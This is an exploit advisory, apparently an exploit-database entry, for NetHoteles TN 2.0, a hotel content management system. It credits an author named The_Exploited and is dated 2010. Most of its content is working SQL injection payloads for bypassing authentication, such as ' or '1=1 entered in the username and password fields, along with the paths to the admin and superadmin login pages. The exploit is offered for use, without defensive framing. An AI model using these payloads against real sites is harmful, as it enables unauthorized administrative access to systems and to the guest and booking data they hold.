id: 11636
date: 04/05/2010
title: NetHoteles TN 2.0 (Auth Bypass) SQL Injection Vulnerability
author: The_Exploited
cves: 

===========================================================
NetHoteles TN 2.0 (Auth Bypass) SQL Injection Vulnerability
===========================================================

@Title: NetHoteles TN 2.0 (Auth Bypass) SQL Injection Vulnerability
  @Author: The_Exploited aka l3d aka Spoof
  @Mail: spoof@live.it
  @Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/
  @Exploit:
Username: 'or'
Password: 'or'
  or
  Username: ' or '1=1
Password: ' or '1=1
  @Demo for superdamin dir.: http://www.site.com/nethoteles/superadmin
  @Demo for admin dir.: http://www.site.com/nethoteles/admin
  @CMS Version: <= 2.0
  @Date: 2010-02-13



#  0day.today [2023-03-24]  #